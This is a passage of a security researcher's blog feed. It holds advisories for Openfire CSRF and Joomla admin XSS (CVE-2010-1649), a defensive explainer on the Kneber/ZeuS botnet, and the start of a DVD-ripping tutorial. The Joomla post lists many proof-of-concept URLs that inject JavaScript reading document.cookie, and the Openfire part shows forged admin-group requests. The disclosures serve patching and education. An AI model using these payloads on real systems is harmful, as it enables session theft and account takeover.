/&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;add=Add&amp;amp;username=admin&amp;amp;addbutton=Add&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;add=Add&amp;amp;username=admin&amp;amp;addbutton=Add&gt;&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;admin=abc@example.com&amp;amp;updateMember=Update&lt;br /&gt;http://target-url/group-edit.jsp?group=NewGroup&amp;amp;admin=abc@example.com&amp;amp;updateMember=Update&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;/span&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;img 
src="http://feeds.feedburner.com/~r/riyazwalikar/~4/EKJgYzhkTAk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/6210810762529438975/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/02/multiple-xss-and-xsrf-issues-in.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6210810762529438975?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/6210810762529438975?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/EKJgYzhkTAk/multiple-xss-and-xsrf-issues-in.html" title="Multiple XSS and XSRF issues in Openfire 3.6.4" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/02/multiple-xss-and-xsrf-issues-in.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQFRHs8fip7ImA9WxFVFUw.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-8383913600538045730</id><published>2010-06-11T02:56:00.000-07:00</published><updated>2010-06-14T04:18:35.576-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-14T04:18:35.576-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="joomla" /><category scheme="http://www.blogger.com/atom/ns#" term="bid" /><category scheme="http://www.blogger.com/atom/ns#" term="admin" /><category scheme="http://www.blogger.com/atom/ns#" term="cve" /><category scheme="http://www.blogger.com/atom/ns#" 
term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><title>Multiple Joomla! XSS Vulnerabilities - CVE-2010-1649</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Last month, while doing some tests on a Joomla! installation on my home computer, I came across a very glaring security issue. The Joomla! admin module has several components that are used to manage the site and its users. Several of these components have a search text box that allows users to search through the list of entities displayed. For example, the search box in the com_users component allows searching the list of users displayed. The issue was with the search boxes not sanitizing user input. That meant you could enter HTML text in the boxes and it would be rendered and displayed! That is exactly the cause of the world's most common web application vulnerability, Cross Site Scripting, more commonly known as XSS.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;This should help beginners understand XSS.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Cross-site_scripting"&gt;http://en.wikipedia.org/wiki/Cross-site_scripting&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. 
An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigation implemented by the site's owner.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Cross Site Scripting can be divided into 2 classes. Persistent and Non-Persistent. The following exploit examples should make things clearer:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;Examples taken from Wikipedia.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Non-persistent:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  2. Mallory observes that Bob's website contains a reflected XSS vulnerability.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. 
This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  4. Alice visits the URL provided by Mallory while logged into Bob's website.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;Persistent attack:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  1. Mallory posts a message with malicious payload to a social network.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  2. When Bob reads the message, Mallory's XSS steals Bob's cookie.&lt;/span&gt;&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;  3. Mallory can now hijack Bob's session and impersonate Bob.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;All versions of Joomla! prior to 1.5.18 are vulnerable to an XSS injection attack in the admin module. The following are the vulnerability details and exploit code.&lt;br /&gt;&lt;span style=";font-family:arial;font-size:95%;"  &gt;&lt;br /&gt;* Project: Joomla!&lt;br /&gt;* SubProject: All&lt;br /&gt;* Severity: High&lt;br /&gt;* Versions: 1.5.17 and all previous 1.5 releases&lt;br /&gt;* Exploit type: XSS Injection&lt;br /&gt;* Reported Date: 2010-May-13&lt;br /&gt;* Fixed Date: 2010-May-28&lt;br /&gt;* Fixed Version: Joomla! 
1.5.18&lt;br /&gt;* Update Download Link: http://www.joomla.org/download.html&lt;br /&gt;* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;&lt;br /&gt;User can execute arbitrary JavaScript code within the vulnerable application.&lt;br /&gt;&lt;br /&gt;The vulnerability arises due to the administrator core components failing to properly sanitize user-supplied input in the "search"&lt;br /&gt;variable. Successful exploitation of this vulnerability could result in, but is not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;An attacker can send a link with the exploit to an administrator whose access could compromise the application. The following PoC is&lt;br /&gt;available:&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_users&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_users&amp;amp;search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_trash&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_content&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_sections&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br 
/&gt;http://joomlasite/administrator/index.php?option=com_frontpage&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_menus&amp;amp;task=view&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_messages&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_banners&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_banners&amp;amp;c=client&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_banner&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_contact&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_contact_details&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_newsfeeds&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_newsfeeds&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_poll&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br 
/&gt;http://joomlasite/administrator/index.php?option=com_weblinks&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_categories&amp;amp;section=com_weblinks&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_modules&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;br /&gt;http://joomlasite/administrator/index.php?option=com_plugins&amp;amp;search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;CONFIRM URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;BID: 40444 - http://www.securityfocus.com/bid/40444 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;CVE-2010-1649: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1649 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Secunia: 39964: http://secunia.com/advisories/39964 &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;OSVDB: 65011: http://www.osvdb.org/65011&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s1600/XSS-Admin-ModuleManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 291px;" 
src="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s400/XSS-Admin-ModuleManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578422861601698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/TBYIBuQrTBI/AAAAAAAAAV0/_jNX4DRuaLE/s1600/XSS-Admin-UserManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/TBYIBuQrTBI/AAAAAAAAAV0/_jNX4DRuaLE/s400/XSS-Admin-UserManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578422061026322" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBFdmxUI/AAAAAAAAAVs/nCaXpFSVpRw/s1600/XSS-Admin-ArticleManager.PNG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBFdmxUI/AAAAAAAAAVs/nCaXpFSVpRw/s400/XSS-Admin-ArticleManager.PNG" alt="" id="BLOGGER_PHOTO_ID_5482578411109401922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify; font-family: trebuchet ms;"&gt;Please update your installation of Joomla! 
to the latest available stable release, which at the time of writing was 1.5.18.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/cgIHa2kAhpk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/8383913600538045730/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2010/06/multiple-joomla-xss-vulnerabilities-cve.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8383913600538045730?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8383913600538045730?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/cgIHa2kAhpk/multiple-joomla-xss-vulnerabilities-cve.html" title="Multiple Joomla! 
XSS Vulnerabilities - CVE-2010-1649" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_17JNeVdiZ7k/TBYIBxPjG6I/AAAAAAAAAV8/X_Ht8V6O3CQ/s72-c/XSS-Admin-ModuleManager.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2010/06/multiple-joomla-xss-vulnerabilities-cve.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0MHRH07eyp7ImA9WxBbEkw.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-8319855059437867705</id><published>2010-02-22T01:54:00.000-08:00</published><updated>2010-03-10T03:10:35.303-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-10T03:10:35.303-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Kneber" /><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="zeus" /><category scheme="http://www.blogger.com/atom/ns#" term="tcpview" /><category scheme="http://www.blogger.com/atom/ns#" term="process monitor" /><category scheme="http://www.blogger.com/atom/ns#" term="evil" /><category scheme="http://www.blogger.com/atom/ns#" term="process explorer" /><category scheme="http://www.blogger.com/atom/ns#" term="bots" /><title>The Kneber Botnet</title><content type="html">&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The term Botnet is used to refer to a collection of software robots, or bots, which are automated applications that infect multiple, possibly geographically dispersed, computers. 
These infected computers can then be controlled remotely via a central Command and Control Center (C&amp;amp;C) which the Botnet herder sets up. Botnets are used in underground criminal activities to steal credit card information, perform Distributed Denial of Service attacks, create or misuse SMTP mail relays for spam, commit click fraud and spamdexing, and steal application serial numbers and login IDs for personal banking and online mail accounts.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;While the term "botnet" can be used to refer to any group of bots, such as IRC bots, this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure. This setup is remotely controlled by a Bot herder, also called a Bot master, through a C&amp;amp;C channel over IRC or web servers. When a botnet has become sufficiently large, criminals may try to acquire it for undisclosed but large sums of money to gain access to all the data and resulting information from the infected machines and subsequently from the networks associated with them.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Kneber botnet, discovered by NetWitness, a company that deals with network monitoring and threat analysis solutions, is a new variant of the already massive ZeuS botnet, which has reportedly compromised 75000 machines in 2500 businesses worldwide. The Kneber botnet is based on the older 1.2 version of ZeuS which is given away for free. ZeuS, also known as Zbot, is readily available to buy in underground forums for as little as 700 USD. 
The package contains a builder that can generate a bot executable and Web server files (PHP, images, SQL templates) for use as the command and control server. While ZeuS is a generic back door that allows full control by an unauthorized remote user, the primary function of ZeuS is financial gain: stealing online credentials such as FTP, email, online banking, and other online passwords via keystroke logging. Zeus' current botnet is estimated to include millions of compromised computers (around 3.6 million in the United States alone). Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, and BusinessWeek.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Kneber botnet is a relatively small botnet considering the number of compromised computers, although the number of organizations and businesses infected is quite high. The Kneber botnet uses rootkit technologies, undocumented Windows APIs and other stealth techniques to hide its presence on the infected machine. The Kneber botnet infects only Windows computers and has been known to infect Windows XP Professional SP 2 machines more than any other flavors. The explanation for this could be attributed to the nature in which machines are infected. Computers at the workplace can be infected by visiting sites that cause drive-by downloads, URLs of which may be received via spam mails. Also, vulnerabilities in the browser (IE 6 and IE 7) and security issues in the OS itself may trigger an infection. 
No reports of Windows 7 computers being infected have been seen yet, possibly due to the use of IE 8 and patching of critical vulnerabilities found in older versions of Windows.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Symptoms of infection may include unexplained bandwidth usage, unknown processes being created, unexplained usage of CPU and memory resources and frequent stalling of applications. The ZeuS botnet is very difficult to detect even with up-to-date antivirus software. Ironically, there are other bots, like the Trojan SpyEye, whose installers are built with ZeuS in mind: when SpyEye infects a computer already infected with ZeuS, it can kick out ZeuS and claim the machine for itself. Of course, the computer is still a bot, just with a different Command and Control Center and Bot Herder. The Kneber botnet on the other hand is easily detected and cleaned by most antivirus programs due to its usage of the older version of ZeuS. Egress filtering on traffic at the network perimeter between internal private networks and the Internet may help detect early infection and, coupled with active intrusion detection systems, may protect organizations and businesses alike. Using virtual keyboards, found on the login pages of most banking applications, or the Microsoft On-Screen Keyboard (osk.exe), when entering sensitive data on even trusted sites, will help protect user identities, financial information and data confidentiality. Common utilities like TCPView, Process Monitor and Process Explorer from Sysinternals (Microsoft) will help identify Network, CPU and Memory congestion factors. It is advisable that businesses continue to train their employees not to click links in emails or on the web or open malicious attachments, while also keeping up with antivirus and operating system updates. 
Securing the operating system goes a long way in preventing several unrelated issues as well.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/GgtPV3YEiwg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/8319855059437867705/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2010/02/kneber-botnet.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8319855059437867705?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8319855059437867705?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/GgtPV3YEiwg/kneber-botnet.html" title="The Kneber Botnet" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2010/02/kneber-botnet.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcHQngyeSp7ImA9WxNbF08.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-3625223257228792525</id><published>2009-11-20T01:26:00.000-08:00</published><updated>2009-11-20T04:27:13.691-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-20T04:27:13.691-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="torrents" /><category scheme="http://www.blogger.com/atom/ns#" term="dvdrip" /><category scheme="http://www.blogger.com/atom/ns#" term="xvid" /><category scheme="http://www.blogger.com/atom/ns#" 
term="700mb" /><category scheme="http://www.blogger.com/atom/ns#" term="dvd decrypter" /><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><category scheme="http://www.blogger.com/atom/ns#" term="axxo" /><category scheme="http://www.blogger.com/atom/ns#" term="autogk" /><category scheme="http://www.blogger.com/atom/ns#" term="movie" /><category scheme="http://www.blogger.com/atom/ns#" term="compression" /><title>The 700MB DVDrip Tutorial</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I recently bought a copy of The Lost Symbol from Indiaplaza.in. Along with the book I got the DVD of DaVinci Code free. The site really does deliver what it promises. Anyway, coming back to the real premise of this blog post, I had not seen the movie version of The DaVinci Code and from the reviews and ratings at IMDB, I had no intentions of seeing it any sooner. Yet here I was holding a DVD of DaVinci Code in my hand. I decided to give my DVD ripping skills a test. Not that you require any special skills to rip a DVD into that perfect 700 MB movie that you get on torrents. It's all there on the Internet, the tools and the tutorials. What you will need is at least 5 GB of free space and a bit of patience.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Note that piracy in any form is illegal. I'm not sure about the scenario in India, although I would advise you to buy the DVD if you like the movie. This tutorial (or blog or article or whatever you want to call it) is strictly educational. Please try not to distribute the files generated at the end of the process.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Coming back to what this is all about. You will need two programs. 
One is a DVD Ripping program and the other is AutoGK. I personally use DVD Decrypter because of its ease of use. VirtualDubMod is a substitute program that can be used in place of AutoGK. In fact AutoGK uses VirtualDubMod to compress and create the 700 MB avi. We shall see more of them later. For now download these tools from the following links. The Internet is abundant with these tools and a simple Google search will provide you with numerous links:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;1. DVD Decrypter: &lt;a href="http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe"&gt;http://www.mrbass.org/dvdrip/SetupDVDDecrypter_3.5.4.0.exe&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;2. AutoGK: &lt;a href="http://www.autogk.me.uk/"&gt;http://www.autogk.me.uk&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The requirements before you begin:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;A P4 2.0 GHz or faster Windows XP and higher computer (the more GHz the better)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;At least 1 GB of RAM&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;At least 5 GB free&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;A DVD Drive (like duh..)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;DVD Decrypter&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet 
ms;"&gt;AutoGK&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Lots of patience (because the entire process can take about 2-3 hours depending on the size of the movie and the chosen settings)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Install both the tools and insert the movie DVD into the DVD drive of your computer. It would be advisable to close all open programs since this process is memory and processor intensive.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;span style="font-weight: bold;"&gt;Part I [Ripping the DVD to the hard drive]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Run the DVD Decrypter program from the Desktop or the Start menu &gt; Programs&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s1600/1.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 253px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SwaJuwBK_aI/AAAAAAAAARk/-E9RhpvXA3E/s400/1.PNG" alt="" id="BLOGGER_PHOTO_ID_5406159838961663394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The program window shows DVD information like the Label and the Region Code Enhancement (RCE) protection status etc. 
